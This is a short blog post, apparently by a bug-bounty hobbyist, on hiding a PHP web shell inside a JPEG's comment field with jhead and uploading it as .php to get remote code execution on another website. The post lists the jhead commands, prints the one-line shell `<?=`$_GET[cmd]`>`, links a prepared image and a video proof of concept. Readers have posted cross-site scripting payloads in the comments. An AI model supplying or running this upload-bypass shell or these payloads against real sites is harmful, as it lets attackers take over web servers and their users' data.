u4y8Gs9fLTrJjhsijGL4SHOQBnG6Rdcc2m5wWn1z
Bookmark
Ezpedia

Inject PHP Shell To Image Using Jhead

Parkerzanta
Parkerzanta
Update:
... menit baca
Dengarkan
Inject PHP Shell to Image

This way when I upload a php shell to another website, with Tamper data in Burp by changing the extension from .jpg to .php But it didn't work. 

So, I uploaded an image which I have injected with PHP Script to get RCE and change .jpg to .php

pkg install jhead
jhead -purejpg name.jpg
jhead -ce name.jpg

PHP Shell

<?=`$_GET[cmd]`>
or download sukuna.jpg Here

Video PoC get RCE via Image file upload https://youtu.be/4eGByP9mIH0

Related Posts
8 komentar
Diposting oleh:
Parkerzanta
Parkerzanta
Hi! I am Anta Maulana or can be known as Parkerzanta. I am a blog writer from May 2018, and started to be interested in Bug Bounty in 2019 until now.

Related Posts

8 komentar

  • asdasd
    asdasd
    23 Februari 2023 pukul 00.23
    ds
    Reply
  • Anonim
    Anonim
    15 Desember 2022 pukul 13.03
    Nice tips
    Reply
  • Anonim
    Anonim
    28 Oktober 2022 pukul 03.17
    <>
    Reply
  • Anonim
    Anonim
    28 Oktober 2022 pukul 03.17
    <script>confirm()</script>
    • Anonim
      Anonim
      16 November 2022 pukul 22.16
      Nice try
    Reply
  • Anonim
    Anonim
    28 Oktober 2022 pukul 03.09
    123
    • Anonim
      Anonim
      28 Oktober 2022 pukul 03.15
      PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KCk+
    • Anonim
      Anonim
      28 Oktober 2022 pukul 03.16
      <img src=x onerror=alert()>
    Reply